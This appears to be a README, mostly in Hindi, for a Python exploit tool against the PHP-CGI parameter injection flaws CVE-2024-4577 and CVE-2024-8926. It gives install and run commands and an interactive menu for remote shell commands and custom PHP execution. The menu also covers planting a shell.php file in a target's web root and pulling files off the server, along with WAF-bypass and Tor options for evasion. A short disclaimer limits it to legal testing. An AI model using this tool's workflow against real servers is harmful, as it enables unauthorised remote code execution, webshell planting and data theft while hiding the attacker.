
一個測試CVE-2024-4577和CVE-2024-8926的安全滲透工具
🚀 CVE-2024-4577 और CVE-2024-8926 शोषण उपकरण
PHP-CGI पैरामीटर इंजेक्शन भेद्यता के लिए एक स्वचालित परीक्षण उपकरण, जो CVE-2024-4577 और CVE-2024-8926 का समर्थन करता है, और कमांड निष्पादन, फ़ाइल अपलोड, डाउनलोड आदि संचालन कर सकता है।
यह उपकरण PHP-CGI वातावरण में पैरामीटर इंजेक्शन भेद्यता का परीक्षण करने के लिए उपयोग किया जा सकता है, और प्रदान करता है:
यह उपकरण केवल कानूनी परीक्षण और शैक्षणिक उद्देश्यों के लिए है, कृपया अनधिकृत सिस्टम पर उपयोग न करें!
⚠️ अवैध उपयोग से कानूनी जिम्मेदारी होगी!
यह उपकरण केवल निम्नलिखित के लिए है:
यह उपकरण निम्नलिखित Python पैकेजों पर निर्भर करता है, कृपया पहले स्थापित करें:
pip install -r requirements.txt
या फिर मैन्युअल रूप से स्थापित करें:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
उदाहरण:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
जब स्क्रिप्ट को भेद्यता मिलती है, तो यह एक मेनू प्रदर्शित करेगी:
╭──────────── शोषण मोड मेनू ────────────╮
│ वर्तमान लक्ष्य:http://example.com/ │
│ वर्तमान इंजेक्शन बिंदु:/php-cgi/php-cgi.exe │
│ भेद्यता संख्या:CVE-2024-4577 │
╰────────────────────────────────────────────╯
1) 🧪 शेल मोड
2) 🛠️ PHP कस्टम मोड
3) 📤 फ़ाइल अपलोड करें
4) 📥 फ़ाइल डाउनलोड करें
5) 🎯 आक्रमण लक्ष्य बदलें
6) ⚙️ पैरामीटर सेट करें
7) ❌ प्रोग्राम से बाहर निकलें
>>
सिस्टम कमांड निष्पादित करें:
shell> whoami
📂 आउटपुट सहेजें
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
कस्टम PHP कोड निष्पादित करें:
phpinfo();
EOF
📂 आउटपुट सहेजें
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
स्थानीय फ़ाइल पथ:C:\test\shell.php
लक्ष्य पूर्ण पथ:
[*] अपलोड पथ स्वचालित रूप से सेट किया गया: C:/xampp/htdocs/shell.php
📂 मैन्युअल रूप से पथ निर्दिष्ट करें
लक्ष्य पूर्ण पथ:C:\xampp\php\shell.php
दूरस्थ फ़ाइल पथ:C:\xampp\htdocs\index.php
📂 फ़ाइल डाउनलोड करने के बाद download/ में सहेजी जाती है, यदि डुप्लिकेट हो तो स्वचालित रूप से नंबर जोड़ा जाता है
[*] फ़ाइल डाउनलोड पूर्ण, download/index.php में सहेजी गई
नया लक्ष्य URL दर्ज करें: http://newtarget.com
🔹 भेद्यता का पुनः परीक्षण करेगा
[⚙️ उपयोग चरण पैरामीटर सेटिंग मेनू]
1) पेलोड बदलें 1
2) बाईपास मॉड्यूल चयनित नहीं
3) प्रतीक्षा समय (टाइमआउट) 10 सेकंड
4) अनुरोध विलंब (डिले) 0 सेकंड
5) स्वचालित लॉग (लॉग) बंद
6) विस्तृत मोड (वर्बोज़) बंद
7) एनिमेशन प्रभाव (इफ़ेक्ट्स) चालू
8) बलपूर्वक उपयोग (फ़ोर्स) बंद
9) सहेजें और शोषण मेनू पर लौटें
निम्नलिखित बाईपास रणनीतियाँ प्रदान करता है:
php://input को अन्य लेखन से बदलना| पैरामीटर | विवरण | उदाहरण |
|---|
-u , --url | लक्ष्य URL निर्दिष्ट करें | -u http://example.com |
--timeout sec | अनुरोध टाइमआउट सेट करें (0 अनंत) | --timeout 30 |
--log | शेल कमांड को स्वचालित रूप से लॉग करें | --log |
--payload | पेलोड संयोजन निर्दिष्ट या कस्टम करें | --payload 2 |
--tor | Tor के माध्यम से अनुरोध भेजें | --tor |
--verbose | विस्तृत जानकारी दिखाएँ | --verbose |
--bypass | WAF बाईपास मोड सक्षम करें | --bypass |
--force | बलपूर्वक भेद्यता शोषण मोड में प्रवेश करें | --force |
--cgipoint PATHS | परीक्षण के लिए विशिष्ट CGI पथ निर्दिष्ट करें | --cgipoint /path |
--delay sec | प्रत्येक अनुरोध के बीच विलंब सेकंड | --delay 1.5 |
--no-effects | सभी एनिमेशन और विलंब प्रभाव बंद करें | --no-effects |